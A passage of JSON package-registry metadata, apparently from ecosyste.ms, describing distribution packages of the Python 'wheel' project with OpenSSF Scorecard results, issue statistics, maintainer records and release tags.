uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29350077,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T20:11:40.865Z","status":"ssl_error","status_checked_at":"2026-02-11T20:10:41.637Z","response_time":97,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-02-13T20:18:14.445Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/wheel?arch=source\u0026distro=ubuntu-23.10\u0026repository_url=https://launchpad.net/ubuntu/mantic","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T00:01:56.425Z","issues_count":110,"pull_requests_count":187,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2624958.380116959,"issues_closed_count":98,"pull_requests_closed_count":171,"pull_request_authors_count":38,"issue_authors_count":91,"avg_comments_per_issue":5.872727272727273,"avg_comments_per_pull_request":3.5828877005347595,"merged_pull_requests_count":145,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":11,"past_year_pull_requests_count":24,"past_year_avg_time_to_close_issue":215250.42857142858,"past_year_avg_time_to_close_pull_request":1111066.1,"past_year_issues_closed_count":7,"past_year_pull_requests_closed_count":20,"past_year_pull_request_authors_count":9,"past_year_issue_authors_count":10,"past_year_avg_comments_per_issue":5.0,"past_year_avg_comments_per_pull_request":3.5416666666666665,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":4,"past_year_merged_pull_requests_count":16,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/wheel/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.10","url":"https://launchpad.net/ubuntu/mantic","ecosystem":"ubuntu","default":false,"packages_count":36642,"maintainers_count":0,"namespaces_count":4,"keywords_count":2223,"github":"ubuntu","metadata":{"codename":"mantic","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":444},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.636Z","updated_at":"2026-06-10T05:17:48.008Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/namespaces"}},{"id":13308614,"name":"python311Packages.wheel","ecosystem":"nixpkgs","description":"A built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T07:11:23.073Z","latest_release_published_at":"2026-02-02T07:11:23.073Z","latest_release_number":"0.41.1","last_synced_at":"2026-03-07T19:30:32.653Z","created_at":"2026-02-02T07:11:20.512Z","updated_at":"2026-03-07T20:03:00.460Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=python311Packages.wheel","install_command":"nix-env -iA nixpkgs.python311Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/development/python-modules/wheel/default.nix#L36","metadata":{"nix_attribute":"python3.11-wheel-0.41.1","position":"pkgs/development/python-modules/wheel/default.nix:36","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.wheel?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":25,"html_url":null,"role":null,"created_at":"2026-03-07T19:30:33.039Z","updated_at":"2026-03-07T19:30:33.039Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":229},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-06-10T05:16:53.702Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":12904817,"name":"python314Packages.wheel","ecosystem":"nixpkgs","description":"Built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-27T11:12:03.299Z","latest_release_published_at":"2026-01-27T11:12:03.299Z","latest_release_number":"0.46.1","last_synced_at":"2026-03-07T20:20:46.955Z","created_at":"2026-01-27T11:12:03.092Z","updated_at":"2026-03-07T21:31:08.652Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=python314Packages.wheel","install_command":"nix-env -iA nixpkgs.python314Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/development/python-modules/wheel/default.nix#L29","metadata":{"nix_attribute":"python3.14-wheel-0.46.1","position":"pkgs/development/python-modules/wheel/default.nix:29","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","aarch64-darwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python314Packages.wheel?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python314Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python314Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python314Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":32,"html_url":null,"role":null,"created_at":"2026-03-07T20:20:47.183Z","updated_at":"2026-03-07T20:20:47.183Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":148656,"maintainers_count":4717,"namespaces_count":0,"keywords_count":2908,"github":"NixOS","metadata":{"funded_packages_count":1599},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-06-10T05:16:03.119Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":6209887,"name":"py3-wheel-doc","ecosystem":"alpine","description":"built-package format for Python (documentation)","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2020-12-14T10:43:20.000Z","latest_release_published_at":"2020-12-14T10:43:20.000Z","latest_release_number":"0.36.2-r0","last_synced_at":"2026-04-02T15:03:23.733Z","created_at":"2023-02-01T02:50:27.668Z","updated_at":"2026-04-02T15:03:23.733Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.13/community/x86_64/py3-wheel-doc","install_command":"apk add py3-wheel-doc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"comm